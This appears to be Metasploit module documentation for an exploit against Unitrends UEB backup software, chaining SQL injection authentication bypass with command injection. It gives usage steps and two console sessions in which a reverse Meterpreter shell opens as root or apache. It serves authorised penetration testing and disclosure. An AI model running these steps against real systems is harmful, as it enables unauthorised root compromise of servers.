## Vulnerable Application

This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent RCE.

This exploit has two targets:

  1. Unitrends UEB 9 http api/storage RCE for root privileges
  2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges

## Verification Steps

  1. ```use exploit/linux/http/ueb_api_rce```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```set target [#]```
  5. ```exploit```
  6. A meterpreter session should have been opened successfully

## Scenarios

### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit

```
msf5 > use exploit/linux/http/ueb_api_rce 
msf5 exploit(linux/http/ueb_api_rce) > set target 0
target => 0
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Command Stager progress - 126.63% done (1051/830 bytes)
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400

meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit

```
msf5 > use exploit/linux/http/ueb_api_rce 
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > shell
Process 25534 created.
Channel 1 created.
whoami
apache
```